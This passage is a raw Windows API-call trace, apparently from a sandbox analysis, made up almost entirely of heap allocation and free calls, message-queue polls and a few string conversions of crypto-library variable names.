Flags=0x0, Size=0x10) returned 0x2e505a8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0204.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0204.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0204.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0204.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0204.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0204.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0204.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0204.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0204.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0204.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0204.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0204.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0204.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0204.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0204.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0204.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0204.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0204.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0204.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.442] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0204.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0204.442] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0204.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.442] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0204.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.443] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0204.443] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0204.443] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0204.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.443] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0204.444] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.444] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.444] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0204.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0204.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0204.445] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0204.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0204.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0204.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0204.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0204.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.446] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0204.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0204.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.446] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0204.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0204.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0204.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0204.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0204.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0204.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0204.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0204.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, 